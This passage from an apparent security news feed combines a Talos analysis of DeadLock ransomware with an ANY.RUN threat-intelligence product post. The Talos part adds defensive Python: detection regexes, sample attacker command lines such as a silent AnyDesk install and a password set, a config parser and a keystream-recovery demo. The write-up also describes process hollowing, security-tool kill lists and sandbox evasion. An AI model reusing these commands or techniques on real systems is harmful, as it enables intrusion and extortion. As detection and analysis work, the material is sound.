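     "cmd": r'C:\AnyDesk.exe --install "C:\Program Files (x86)\AnyDesk" --start-with-win --silent --update-disabled'},
    {"ts": "2025-11-05T07:02:50", "host": "ADMIN-01", "user": r"CORP\j.doe",
     "cmd": r'"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --set-password'},
]

# (rule id, ATT&CK technique as cited in the write-up, command-line pattern)
RULES = [
    ("rdp_enabled_via_registry", "T1112",
     r"\breg(\.exe)?\s+add\b.*fDenyTSConnections\b.*/d\s*0\b"),
    ("firewall_rule_opens_3389", "T1562.004",
     r"\bnetsh\s+advfirewall\s+firewall\s+add\s+rule\b.*\blocalport=3389\b.*\baction=allow\b"),
    ("remoteregistry_enabled", "T1569.002",
     r"\bsc(\.exe)?\s+(config\s+RemoteRegistry\s+start=\s*(demand|auto)|start\s+RemoteRegistry)\b"),
    ("defender_settings_tampered", "T1562.001",
     r"\bSystemSettingsAdminFlows(\.exe)?\s+Defender\s+(RTP|SpynetReporting|SubmitSamplesConsent|DisableEnhancedNotifications)\b"),
    ("anydesk_silent_install", "T1219.002",
     r"\bAnyDesk(\.exe)?\"?\s+--install\b.*--silent\b"),
    ("anydesk_unattended_password", "T1219.002",
     r"\bAnyDesk(\.exe)?\"?\s+--set-password\b"),
]
COMPILED = [(rid, tech, re.compile(rx, re.IGNORECASE)) for rid, tech, rx in RULES]


def match_event(event: dict) -> list:
    """Return (rule id, technique) for every rule the event's command line matches."""
    return [(rid, tech) for rid, tech, rx in COMPILED if rx.search(event["cmd"])]


def correlate(events, window: timedelta = timedelta(hours=24), min_distinct: int = 3) -> dict:
    """Flag a host when at least `min_distinct` different rules fire on it within `window`.
    Individual hits remain low-severity signals; the combination is what escalates."""
    hits = defaultdict(list)
    for e in events:
        t = datetime.fromisoformat(e["ts"])
        for rid, _ in match_event(e):
            hits[e["host"]].append((t, rid))
    flagged = {}
    for host, hs in hits.items():
        hs.sort()
        for i, (t0, _) in enumerate(hs):
            rules = {rid for t, rid in hs[i:] if t - t0 <= window}
            if len(rules) >= min_distinct:
                flagged[host] = sorted(rules)
                break
    return flagged


if __name__ == "__main__":
    for e in EVENTS:
        for rid, tech in match_event(e):
            print(f"{e['ts']} {e['host']:<9} {rid:<28} {tech}")
    print("escalated hosts:", correlate(EVENTS))
```

With the default threshold only WS-17 escalates (three distinct techniques within a minute); lowering min_distinct to 2 also surfaces the AnyDesk host, while the Defender tampering on FS-02 stays a single-rule signal because all three commands hit the same rule.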

DeadLock ransomware 

Talos observed that the threat actor deployed DeadLock ransomware as the payload in their attack. DeadLock ransomware has been active since as early as July 2025 and, unlike other ransomware actors, this threat actor does not operate a data leak site. Instead, victims are persuaded to contact the threat actor operating the DeadLock ransomware via Session messenger. 

The DeadLock ransomware encryptor is specifically designed to target the Windows environment. The encryptor binary was written in C++ and compiled in July 2025, indicating the start time of the threat actor’s operation. 

Upon execution, the DeadLock ransomware immediately drops and executes an embedded batch script (.cmd) in the victim’s “ProgramData” folder. This script functions as a loader, first preparing the system by setting up the console code page to UTF-8 by executing the command chcp 65001. This step ensures that the ransom note can be displayed correctly, even with special or non-English characters. After configuring the environment, the script stealthily launches the main ransomware binary and then deletes itself to remove its tracks. 

Figure 6. Malicious batch file that re-runs the ransomware binary. 

The ransomware then uses a process hollowing technique to inject itself into the targeted process rundll32.exe, masquerading as a normal system process in the victim machine. 

Ransomware configuration data 

The DeadLock ransomware relies on a massive 8,888-byte configuration block embedded directly within its binary to dictate its entire operational strategy. Upon execution, the ransomware parses this data using pipe (|) delimiters and loads the structure into memory in the following format: 

[CRYPTO_SEED] | [TIMING] | [PROCESSES] | [SERVICES] | [EXCLUDED_EXTENSIONS] | [EXCLUDED_PATHS] | [CAMPAIGN_ID] | [RANSOM_NOTE] | [HTML_MARKER] | [VISUAL_DATA] 

Figure 7. DeadLock ransomware configuration data in the system memory. 

Talos identified a hardcoded 65-character numeric string within the configuration that serves as the base key for the encryption function:  

10581067105910871088211520721049106420921068109010791065111492178193

This key is coupled with specific timing parameters (1000, 0055242988), which are likely used to implement execution delays and initialize pseudo-random number generation seeds. 
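Because the configuration block is a flat pipe-delimited record, an analyst can carve it from memory and parse it into the ten named fields listed above. The parser below is an added example, not Talos tooling; the sample block, seed and campaign id are constructed, and two details the write-up does not specify are assumptions: a comma as the separator inside list-valued fields, and folder-name matching for the "critical folders" exclusion.

```python
import ntpath
from dataclasses import dataclass

# Field order as described in the write-up.
FIELDS = ("crypto_seed", "timing", "processes", "services", "excluded_extensions",
          "excluded_paths", "campaign_id", "ransom_note", "html_marker", "visual_data")

# Constructed sample block. Every value is invented for the example; the seed is NOT the real
# one from the sample, and the comma list separator is an assumption.
SAMPLE_CONFIG = "|".join([
    "1234567890" * 6 + "12345",                        # 65-digit numeric seed (constructed)
    "1000,0055242988",                                  # timing parameters quoted in the write-up
    "anydesk.exe,rustdesk.exe,mstsc.exe,msmpeng.exe",
    "MSSQLSERVER,VeeamTransportSvc,ccEvtMgr",
    ".exe,.dll,.sys,.msi,.lnk,.boot",
    "$recycle.bin,Program Files,ProgramData,Windows,System Volume Information",
    "ab" * 32,                                          # 64 hex chars, SHA-256-like (constructed)
    "Your files are encrypted. Contact us via Session.",
    "<!doctype html>",
    "",                                                 # visual data omitted in the sample
])


@dataclass
class DeadLockConfig:
    crypto_seed: str
    timing: tuple
    processes: list
    services: list
    excluded_extensions: list
    excluded_paths: list
    campaign_id: str
    ransom_note: str
    html_marker: str
    visual_data: str


class ConfigError(ValueError):
    pass


def parse_config(blob: str, list_sep: str = ",") -> DeadLockConfig:
    """Split the pipe-delimited block into its ten fields and sanity-check the key ones."""
    parts = [p.strip() for p in blob.split("|")]
    if len(parts) != len(FIELDS):
        raise ConfigError(f"expected {len(FIELDS)} fields, got {len(parts)}")
    raw = dict(zip(FIELDS, parts))
    if not raw["crypto_seed"].isdigit():
        raise ConfigError("crypto seed should be a numeric string")
    try:
        timing = tuple(int(x) for x in raw["timing"].split(list_sep))
    except ValueError as exc:
        raise ConfigError(f"timing field is not numeric: {raw['timing']!r}") from exc

    def as_list(s: str) -> list:
        return [x.strip() for x in s.split(list_sep) if x.strip()]

    return DeadLockConfig(
        crypto_seed=raw["crypto_seed"], timing=timing,
        processes=as_list(raw["processes"]), services=as_list(raw["services"]),
        excluded_extensions=as_list(raw["excluded_extensions"]),
        excluded_paths=as_list(raw["excluded_paths"]),
        campaign_id=raw["campaign_id"], ransom_note=raw["ransom_note"],
        html_marker=raw["html_marker"], visual_data=raw["visual_data"])


def is_valid_config(blob: str) -> bool:
    """Convenience wrapper for scanning carved memory regions: True if the blob parses."""
    try:
        parse_config(blob)
        return True
    except ConfigError:
        return False


def would_skip(cfg: DeadLockConfig, path: str) -> bool:
    """Apply the exclusion lists to a Windows path: skip when any directory component is an
    excluded folder name or the file extension is on the excluded list (assumed semantics)."""
    folders = {p.lower() for p in cfg.excluded_paths}
    exts = {e.lower() for e in cfg.excluded_extensions}
    components = [c.lower() for c in path.replace("/", "\\").split("\\")[:-1] if c]
    return any(c in folders for c in components) or ntpath.splitext(path.lower())[1] in exts


if __name__ == "__main__":
    cfg = parse_config(SAMPLE_CONFIG)
    print("seed length:", len(cfg.crypto_seed), "timing:", cfg.timing)
    print("kill list:", cfg.processes, cfg.services)
    for p in (r"C:\Windows\System32\drivers\x.sys", r"C:\Users\alice\Documents\report.docx"):
        print(p, "-> skipped" if would_skip(cfg, p) else "-> would be encrypted")
```

Once the fields are named, the kill lists feed straight into detection content (process and service names to watch for mass termination), and would_skip() lets a responder reason about which files on a recovered image were in scope for encryption.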

The configuration contains a comprehensive “kill list” designed to disable security controls, remote access tools, and file-locking applications. 

The ransomware terminates standard Windows utilities (e.g., Explorer, PowerShell, Task Manager), alongside specific high-value targets: 

  • Remote access: AnyDesk, RustDesk, Microsoft Remote Desktop connection (mstsc). 
  • Cloud storage: Dropbox, OneDrive. 
  • Security: Antimalware Service (msmpeng), SecurityHealthService, SmartScreen. 

The ransomware targets services to release file handles and disable defenses, specifically: 

  • Databases: Microsoft SQL Server (including named instances like MSSQL$VEEAMSQL2012), Sybase SQL Anywhere (dbsrv12), and MySQL (FishbowlMySQL). 
  • Backup and recovery: Enterprise solutions including Veeam (VeeamTransportSvc), Veritas Backup Exec, Acronis, CA Arcserve, and Carbonite. 
  • Security suites: Endpoint protection components from Symantec/Norton (ccEvtMgr, RTVscan), McAfee (MVArmor), and 360 Security defender (zhudongfangyu). 
  • Business applications: Intuit QuickBooks, Microsoft Exchange, Apache Tomcat, and VMware tools (vmware-usbarbitator6s4). 

To ensure the OS remains stable enough for the victim to pay the ransom, the configuration enforces strict exclusion lists: 

  • Critical folders: $recycle.bin, Program Files, ProgramData, Windows, and System Volume Information. 
  • File extensions: A vast list of executables, drivers, and system files, including .exe, .dll, .sys, .msi, .lnk, and .boot. 
  • Critical files: Boot loaders and system configuration files, such as bootmgr, ntldr, ntuser.dat, and desktop.ini. 

The configuration block also stores the full plaintext ransom note along with an HTML marker (<!doctype html>), which indicates the ransomware can also generate an HTML version of the note. Additionally, Talos observed a unique 64-character, SHA256-like hash value that likely serves as a campaign identifier or infection marker. 

DeadLock ransomware encryption process 

The DeadLock ransomware encryption routine combines recursive directory traversal, memory-mapped file I/O, a custom stream cipher implementation, and multi-threaded processing to encrypt entire file systems efficiently. Because it relies on its own cryptographic implementation rather than the standard Windows cryptographic APIs, it also avoids detections that key on those API calls.  

New BYOVD loader behind DeadLock ransomware attack
Figure 8. DeadLock ransomware encryption process flow diagram. 

The encryption orchestration function begins by recursively traversing directories to enumerate all accessible files on the target system, applying the exclusion filters from the parsed configuration data as it goes. 

The orchestration function then calls a key generation function that derives 8-byte pseudo-random key streams from a time-based seed: it reads the system timer through GetSystemTimeAsFileTime and passes the value through a series of arithmetic operations. 

Finally, it calls the core encryption function, which first performs a UTF-8 validation check on the file's content and then processes the file data in 16-byte blocks. The stream cipher is applied byte by byte using the generated pseudo-random key stream, so the file data is encrypted in memory and the encrypted result is written back to the filesystem.  The ransomware then renames each encrypted file by appending the hexadecimal identifier and the file extension ".dlock". 

Figure 9. DeadLock ransomware’s core encryption function applies to a stream cipher algorithm to encrypt the targeted files. 
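The time-seeded key generation described above invites a general cryptographic observation that is worth making explicit for responders. The following Python is an added, constructed illustration; it is not DeadLock's code and not from the Talos post, and the toy xorshift generator, the whole-second seed granularity, and the FILETIME-like sample value are all assumptions of the example. It shows that a keystream derived from a clock reading carries no more entropy than the window in which the clock value could fall, so a known plaintext prefix (a file magic) plus an approximate encryption time lets a defender enumerate candidate seeds. The post does not state whether DeadLock's own derivation is recoverable this way; the practical takeaway is to preserve original file timestamps and keep an unencrypted sample of common file types during incident response, because any recovery tooling depends on them.

```python
"""
Constructed illustration of why a keystream seeded from the system clock is
weaker than its length suggests. The toy generator below is NOT DeadLock's
algorithm; it only mirrors the structure the write-up describes
(FILETIME-style seed -> arithmetic -> 8-byte key blocks XORed over the data).
"""
import struct

MASK64 = (1 << 64) - 1
FILETIME_TICKS_PER_SEC = 10_000_000   # FILETIME counts 100 ns intervals


def keystream(seed, length):
    """Toy xorshift64 generator emitting `length` bytes in 8-byte blocks (constructed)."""
    x = (seed & MASK64) or 1           # xorshift must never start from zero
    out = bytearray()
    while len(out) < length:
        x ^= (x << 13) & MASK64
        x ^= x >> 7
        x ^= (x << 17) & MASK64
        out += struct.pack("<Q", x)
    return bytes(out[:length])


def xor_stream(data, seed):
    """Encrypt or decrypt (XOR is its own inverse) with the toy keystream."""
    return bytes(a ^ b for a, b in zip(data, keystream(seed, len(data))))


def recover_seed(ciphertext, known_prefix, window_start, window_end, step):
    """Try every seed in [window_start, window_end] at `step` ticks.

    Returns the first seed whose keystream turns the ciphertext prefix back
    into known_prefix, or None if no candidate in the window works.
    """
    n = len(known_prefix)
    for seed in range(window_start, window_end + 1, step):
        if xor_stream(ciphertext[:n], seed) == known_prefix:
            return seed
    return None


def demo():
    """Constructed scenario: the generator was seeded with the encryption-time
    FILETIME coarsened to whole seconds (an assumption of this toy). The
    responder knows the file was a PDF ("%PDF-1.7" prefix) and that encryption
    happened inside a two-minute window. Returns (seed found, candidates tried,
    full plaintext recovered?)."""
    true_seed = 133_500_000_000_000_000            # arbitrary FILETIME-like tick value
    plaintext = b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n1 0 obj\n"
    ciphertext = xor_stream(plaintext, true_seed)

    window_start = true_seed - 60 * FILETIME_TICKS_PER_SEC
    window_end = true_seed + 60 * FILETIME_TICKS_PER_SEC
    candidates = (window_end - window_start) // FILETIME_TICKS_PER_SEC + 1   # 121 seeds

    found = recover_seed(ciphertext, b"%PDF-1.7", window_start, window_end,
                         FILETIME_TICKS_PER_SEC)
    recovered = found is not None and xor_stream(ciphertext, found) == plaintext
    return found, candidates, recovered


if __name__ == "__main__":
    print(demo())
```

The search space here is 121 seeds; the same idea with finer seed granularity only multiplies the candidate count by the granularity, so the cost is set by how precisely the encryption time is known, never by the 64-bit width of the seed.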

To evade automated sandbox analysis, the ransomware executes a delay function that waits 50 seconds before it initiates the encryption action. 

Figure 10. Execution delay inclusion function of DeadLock ransomware.

During its execution, the DeadLock ransomware drops an icon file, Windows batch script, and a bitmap image file in the ProgramData folder of the victim machine.  

Figure 11. Dropped files of DeadLock ransomware in the ProgramData folder.

Talos observed that the ransomware replaces the icon of encrypted files with a custom icon: it points the "DefaultIcon" registry key for the .dlock file extension, in the victim machine's Software registry hive, to the path of the dropped icon file.  

Figure 12. DeadLock ransomware icon file. 

After encryption, the actor also changed the victim machine’s desktop wallpaper to a custom wallpaper and disabled the command line utilities in the victim machine.  

Figure 13. DeadLock ransomware wallpaper.

The ransomware drops the ransom note in each of the folders in the victim machine where the targeted files have been encrypted. 

Figure 14. DeadLock’s ransom note file. 

The DeadLock ransom note opens with an alarming claim of "military-grade encryption" followed by a six-step recovery process. The note states that ransom payment is accepted in Bitcoin or Monero and includes warnings against renaming files or attempting third-party decryption. The personal identifier "READ ME.hex_identifier.txt" at the end of the ransom note is likely a victim identification marker. 

The threat actor employs the Session messenger as their primary communication platform, leveraging its end-to-end encryption and anonymity features to evade law enforcement surveillance while maintaining victim contact through the session ID. 
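The host-side behaviours described above (renames to the ".dlock" extension, the icon, batch script and bitmap dropped into ProgramData, the DefaultIcon registry write for ".dlock", and the "READ ME.<hex>.txt" note written per folder) are concrete enough to turn into endpoint detection logic. The following Python is an added example, not code from the Talos post: it runs four rules over a stream of constructed events in a simple normalized form (timestamp, event type, process, target). The event schema, the registry path used in the sample, the "<name>.<hex>.dlock" rename pattern and the thresholds are assumptions of the example; map the event types onto your own EDR or Sysmon telemetry.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Thresholds are constructed starting points; tune them to your telemetry.
RENAME_THRESHOLD = 5                    # .dlock renames by one process ...
RENAME_WINDOW = timedelta(seconds=10)   # ... inside this window -> alert
DROP_SET = {".ico", ".bat", ".bmp"}     # the ProgramData drop set named in the write-up
NOTE_RE = re.compile(r"READ ME\.[0-9a-fA-F]+\.txt$")            # "READ ME.<hex_identifier>.txt"
DEFAULT_ICON_RE = re.compile(r"\\\.dlock\\DefaultIcon$", re.IGNORECASE)

# Constructed events: "<iso-timestamp>|<type>|<process>|<target>".
# Types: file_rename (target = new name), file_create, reg_set (target = key path).
SAMPLE_EVENTS = [
    "2025-01-10T10:00:00|file_create|C:\\Users\\v\\tmp.exe|C:\\ProgramData\\dlock.ico",
    "2025-01-10T10:00:01|file_create|C:\\Users\\v\\tmp.exe|C:\\ProgramData\\wall.bmp",
    "2025-01-10T10:00:01|file_create|C:\\Users\\v\\tmp.exe|C:\\ProgramData\\run.bat",
    "2025-01-10T10:00:02|reg_set|C:\\Users\\v\\tmp.exe|HKLM\\SOFTWARE\\Classes\\.dlock\\DefaultIcon",
    "2025-01-10T10:00:52|file_rename|C:\\Users\\v\\tmp.exe|C:\\Users\\v\\Documents\\a.docx.ab12cd.dlock",
    "2025-01-10T10:00:53|file_rename|C:\\Users\\v\\tmp.exe|C:\\Users\\v\\Documents\\b.xlsx.ab12cd.dlock",
    "2025-01-10T10:00:53|file_rename|C:\\Users\\v\\tmp.exe|C:\\Users\\v\\Documents\\c.pdf.ab12cd.dlock",
    "2025-01-10T10:00:54|file_rename|C:\\Users\\v\\tmp.exe|C:\\Users\\v\\Documents\\d.jpg.ab12cd.dlock",
    "2025-01-10T10:00:55|file_rename|C:\\Users\\v\\tmp.exe|C:\\Users\\v\\Documents\\e.txt.ab12cd.dlock",
    "2025-01-10T10:00:55|file_create|C:\\Users\\v\\tmp.exe|C:\\Users\\v\\Documents\\READ ME.ab12cd.txt",
    "2025-01-10T10:01:00|file_rename|C:\\Windows\\explorer.exe|C:\\Users\\v\\notes-old.txt",  # benign
]


def parse_event(line):
    """Split one normalized event line into (datetime, type, process, target)."""
    ts, etype, proc, target = line.split("|", 3)
    return datetime.fromisoformat(ts), etype, proc, target


def detect(lines):
    """Return (rule, process, detail) tuples; each rule fires once per process."""
    alerts = []
    fired = set()                      # (rule, proc) pairs already raised
    renames = defaultdict(deque)       # proc -> timestamps of recent .dlock renames
    drops = defaultdict(set)           # proc -> drop-set extensions seen under ProgramData

    def raise_once(rule, proc, detail):
        if (rule, proc) not in fired:
            fired.add((rule, proc))
            alerts.append((rule, proc, detail))

    for line in lines:
        t, etype, proc, target = parse_event(line)
        low = target.lower()
        if etype == "file_rename" and low.endswith(".dlock"):
            q = renames[proc]
            q.append(t)
            while t - q[0] > RENAME_WINDOW:       # slide the window forward
                q.popleft()
            if len(q) >= RENAME_THRESHOLD:
                raise_once("mass_rename_dlock", proc,
                           f"{len(q)} renames within {RENAME_WINDOW.seconds}s")
        elif etype == "file_create":
            if NOTE_RE.search(target):
                raise_once("ransom_note_drop", proc, target)
            elif "\\programdata\\" in low:
                ext = low[low.rfind("."):] if "." in low else ""
                if ext in DROP_SET:
                    drops[proc].add(ext)
                    if drops[proc] == DROP_SET:   # all three artifacts seen from one process
                        raise_once("programdata_drop_set", proc, ",".join(sorted(DROP_SET)))
        elif etype == "reg_set" and DEFAULT_ICON_RE.search(target):
            raise_once("dlock_defaulticon_set", proc, target)
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The DefaultIcon write and the ransom note name are the highest-confidence signals because neither has a benign equivalent; the rename burst is the one most likely to fire before encryption has finished, so it is the rule worth wiring to an automated containment action.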

Coverage 

Ways our customers can detect and block this threat are listed below.  

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.  

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.  

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.  

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.  

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.  

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. Secure Access provides seamless, transparent and secure access to the internet, cloud services or private applications no matter where your users work. Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.  

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.   

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.   

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.  

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.   

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Snort SIDs for the threats are:  65576, 65575 and 301358.

ClamAV detections are also available for this threat: 

  • Win.Tool.EDRKiller-10058432-0 
  • Win.Tool.VulnBaiduDriver-10058431-1 
  • Ps.Tool.DeleteShadowCopies-10058429-0 
  • Win.Ransomware.Deadlock-10058428-0 

Indicators of compromise (IOCs) 

The IOCs can also be found in our GitHub repository here

Cisco Talos Blog – Read More

Track Evolving Cyber Threat Landscape for Your Industry & Country in Real Time 

Effective cyber security depends on knowing which risks matter most. ANY.RUN’s Threat Intelligence Lookup provides industry and geographic context, powered by live attack investigations from 15,000+ companies, that SOC teams need to prioritize alerts, IOCs, and threats with confidence and build their defense strategy for maximum ROI. 

Here’s how. 

Challenge: Context-free TI Wastes SOC Time 

Most threat intelligence sources return long lists of IPs, domains, and hashes, but they rarely explain how those indicators map to a specific sector or region. SOC teams end up treating every threat as equally important, spreading detection and hunting efforts thin and burning time on noise instead of the threats that actually appear in their environment. 

For MSSPs, the problem is even sharper: they serve clients from many fields at once. The lack of industry or geo context makes it hard to prioritize work and hard to prove value to clients who expect sector-aware monitoring. 

Solution: Industry & Geo Threat Landscape for Every Indicator 

Industry & geo threat landscape data for the Tycoon2FA phishkit 

TI Lookup now adds an extra layer of context on top of every Premium search query. In addition to listing IOCs, IOAs, IOBs, and sandbox sessions, it builds a real-time snapshot of which industries and countries are most commonly associated with the threat or indicators you queried. 

The functionality provides three key context fields: 

Field                  | Description                                                                                                          | Benefit
Risk score by industry | Likelihood (%) that the queried threat/indicator is linked to attacks on each industry, based on the search results. | See how likely your industry is to face similar threats, so you can prioritize defenses.
Threat names           | How often (%) each threat appears in the current search results.                                                    | Discover the most likely threats related to your query for focused investigation and response.
Submission countries   | How often the queried threat/indicator appears in submissions from each country, based on the search results.       | See where relevant threats are reported most to uncover geographic hotspots and trends.

TI Lookup now turns your threat landscape into a live, industry-aware radar. It shows exactly how a given threat or indicator maps to specific sectors and countries, so you see where it really matters for your business instead of drowning in generic feeds.  

Powered by real-time analysis of attacks on 15,000 organizations worldwide, it helps you connect threats, techniques, and affected industries, surface niche campaigns, and act before they hit your environment. 

How SOCs Use it in Daily Workflows 

There are several use cases for TI Lookup’s threat landscape functionality. 

1. Starting from a known threat 

A Tier 2–3 analyst already knows the threat or malware family involved. 

They open TI Lookup, search by threat name, and review the industry breakdown in the Threat names view. 

Example: 

threatName:"agenttesla" 

Overview of Agent Tesla in TI Lookup 

The landscape view shows that Agent Tesla is related to malicious activity in industries like education, technologies, telecommunications, and finance. The analyst can see whether their own sector shows up or stays near zero.  

If the match is strong, the analyst treats it as highly relevant, assesses risk, and pulls only the domains, IPs, and other artifacts that make sense for their company. 

2. Starting from an industry 

An analyst, a SOC lead, or even a CISO wants to see an existing threat landscape for their company’s sector. They query by industry to get a list of Threat names that most often appear in samples linked to that vertical. 

Example: 

industry:"finance" AND submissionCountry:"germany" 

TI Lookup sharing info on threats submitted in Germany and relevant for finance companies  

For German companies in finance, the most relevant threats according to TI Lookup are Tycoon2FA, Zhong Stealer, PXA Stealer, and several others. 

From there, the user can refine the query (for example, by a threat type) to uncover the most relevant connections for their environment. 

TI Lookup also makes it possible to set up Query Updates that notify the users about new results for their queries. This way, they can continuously receive new info about threats related to the industry. 

Subscribe to Query Updates and receive notifications for new results based on your search 

3. Starting from any IOC or behavior 

An analyst starts with any IOC, behavior, or pattern that is not explicitly tied to Industries or Threat names. Say your SIEM detects a suspicious connection. The SOC analyst in charge submits it to TI Lookup and instantly gets full context. 

Example: 

domainName:"productivelookewr.shop" 

TI Lookup sharing verdict and related info on a domain 

TI Lookup instantly shows that the indicator belongs to the Lumma Stealer and appears in threat samples related to telecommunications and technologies companies in Italy and the United States.  

This insight helps the analyst judge how relevant and serious the activity is for their own organization or clients. It also guides the next actions: escalating the alert, looking for similar activity, collecting related artifacts, and updating detection rules. 

4. Starting from an existing security gap 

A CISO or SOC Head knows the company has already faced several incidents related to a certain type of threat. They can pivot on it and combine this with the industry and organization’s country.  

Example: 

Let’s say a security lead in a finance organization sees that the company struggles with phishing. With TI Lookup, they can uncover what common phishing attacks are analyzed by similar businesses in their country: 

industry:"Finance" and submissionCountry:"br" and threatName:"phishing" 

Overview of phishing threats submitted in Brazil, relevant for finance organizations 

They receive the most common threat names (Tycoon2FA, Storm1747) and sandbox analyses of real-world threats with indicators. This becomes a live backlog for detection engineering, threat hunting hypotheses, and training cases tailored to that sector instead of generic global lists.  

Next, the security lead works with the SOC to turn these threats into concrete actions: prioritizing detections and playbooks for the most common phishing families, rolling out focused awareness training, and tightening controls around the channels those campaigns abuse. 
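The four use cases above all rely on the same query syntax (field:"value" terms joined by AND, with field values matched case-insensitively, as the mixed-case queries show) and on the three context fields from the table earlier in the post. The following Python is an added example, not ANY.RUN's code: it parses that query form, filters a constructed set of sandbox-session records, and computes the three context fields as percentages of the matching sessions, then applies the relevance decision from use case 3. The record layout, the percentage formula (share of matching sessions) and the session data are assumptions; the records were constructed to mirror the threat, industry and country associations the post mentions, and the one domain used is the one quoted above.

```python
import re
from collections import Counter

# One term looks like  field:"value"  (straight or curly quotes, as copied from a web page).
TERM_RE = re.compile(r'(\w+):["\u201c]([^"\u201d]*)["\u201d]')

# Constructed sandbox sessions; the associations mirror the examples in the post.
SAMPLE_SESSIONS = [
    {"threatName": "tycoon2fa",  "industry": "finance",            "submissionCountry": "br", "domainName": "login-a.example.invalid"},
    {"threatName": "tycoon2fa",  "industry": "finance",            "submissionCountry": "de", "domainName": "login-b.example.invalid"},
    {"threatName": "storm1747",  "industry": "finance",            "submissionCountry": "br", "domainName": "mail-a.example.invalid"},
    {"threatName": "agenttesla", "industry": "education",          "submissionCountry": "us", "domainName": "smtp-a.example.invalid"},
    {"threatName": "agenttesla", "industry": "finance",            "submissionCountry": "br", "domainName": "smtp-b.example.invalid"},
    {"threatName": "lumma",      "industry": "telecommunications", "submissionCountry": "it", "domainName": "productivelookewr.shop"},
    {"threatName": "lumma",      "industry": "technologies",       "submissionCountry": "us", "domainName": "productivelookewr.shop"},
    {"threatName": "tycoon2fa",  "industry": "healthcare",         "submissionCountry": "br", "domainName": "login-c.example.invalid"},
]


def parse_query(query):
    """Turn 'a:"x" AND b:"y"' into {field: value}; values are lowercased.

    Only AND conjunctions are supported (the only operator the post shows);
    anything else raises ValueError so a malformed query is not silently
    treated as a match-everything search.
    """
    terms = {}
    for part in re.split(r"\s+and\s+", query.strip(), flags=re.IGNORECASE):
        m = TERM_RE.fullmatch(part.strip())
        if not m:
            raise ValueError(f"unsupported query term: {part!r}")
        terms[m.group(1)] = m.group(2).lower()
    return terms


def search(sessions, query):
    """Return the sessions matching every term of the query (case-insensitive equality)."""
    terms = parse_query(query)
    return [s for s in sessions
            if all(str(s.get(field, "")).lower() == value for field, value in terms.items())]


def landscape(results):
    """The three context fields, each as {value: percent of matching sessions}, most common first."""
    n = len(results)
    if n == 0:
        return {"riskByIndustry": {}, "threatNames": {}, "submissionCountries": {}}

    def share(field):
        counts = Counter(s[field] for s in results)
        return {k: round(100 * v / n, 1) for k, v in counts.most_common()}

    return {"riskByIndustry": share("industry"),
            "threatNames": share("threatName"),
            "submissionCountries": share("submissionCountry")}


def relevant_for(query, my_industry, my_country, sessions=SAMPLE_SESSIONS, threshold=25.0):
    """Use-case 3 decision: does the indicator's landscape overlap the analyst's own sector or region?

    The 25% threshold is a constructed default; an empty result set is never relevant.
    """
    view = landscape(search(sessions, query))
    return (view["riskByIndustry"].get(my_industry.lower(), 0.0) >= threshold
            or view["submissionCountries"].get(my_country.lower(), 0.0) >= threshold)


if __name__ == "__main__":
    print(landscape(search(SAMPLE_SESSIONS, 'threatName:"agenttesla"')))
    print(landscape(search(SAMPLE_SESSIONS, 'industry:"Finance" and submissionCountry:"br"')))
    print(relevant_for('domainName:"productivelookewr.shop"', "telecommunications", "it"))
```

The ordering of `threatNames` is by frequency, which is the ranked list use case 2 and the SOC-lead workflow describe; the raw percentages are only as meaningful as the number of matching sessions behind them, so a production version should carry `len(results)` alongside the shares.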

Benefits for SOCs and MSSPs 

TI Lookup together with the new Industry & geo threat landscape functionality provides significant value to security teams. 

For CISOs and MSSP leads 

  • Faster, scalable prioritization of threats per client segment (finance, healthcare, manufacturing, etc.). 
  • Standardized rules and hunting scenarios by industry and country for consistent service quality. 
  • Clear evidence in reports that monitoring accounts for sector and regional risk. 

A managed security provider can group clients by industry and region and use TI Lookup to pull the most relevant threat names for each segment. This can help them standardize rule sets and hunting scenarios for finance, healthcare, manufacturing, and other spheres. 

For any new threat, they can quickly check which industries and countries it most often appears in and flag the matching customers as higher risk. They then can export the associated domains, IPs, and other artifacts and roll out protections to all affected environments in one go. 

For SOC leads  

  • Quick view of which threats are truly applicable to the organization’s industry and geography. 
  • Sharper focus for detections, playbooks, and training content around the most relevant threats. 
  • Immediate access to domains/IPs/artifacts for blocking and hunting when a known threat appears. 

A SOC lead can start by querying TI Lookup for their own industry and country to get a ranked list of the most applicable threat names. This immediately shows which families and campaigns should drive new detections, playbooks, and training. 

When a known threat appears, they can use the same view to see which industries it is most often associated with. If their sector is high on the list, they can raise the priority, pull the related domains, IPs, and artifacts, and push them into blocking and hunting across their environment. 

For SOC Tier 2–3 analysts 

  • Less noisy TI and faster understanding of where each threat actually matters. 
  • Simple pivots: from threat to industries/countries and from industries/countries to relevant threat names. 
  • Rich artifacts to enrich cases, accelerating triage, incident response, and hunting accuracy. 

Tier 2–3 analysts are often overwhelmed with alert noise and need to know whether a given threat actually matters for a specific case or industry. With TI Lookup, they can start from a threat name and immediately see how it breaks down by industries and countries, or start from an industry/country and get the most relevant threat names back. 

For each query, they also receive concrete artifacts like domains, IPs, and other indicators to enrich their cases. This speeds up triage, incident response, and threat hunting, while making the recommendations they give to the SOC lead more accurate and grounded in real-world context. 

How It Impacts Key Metrics 

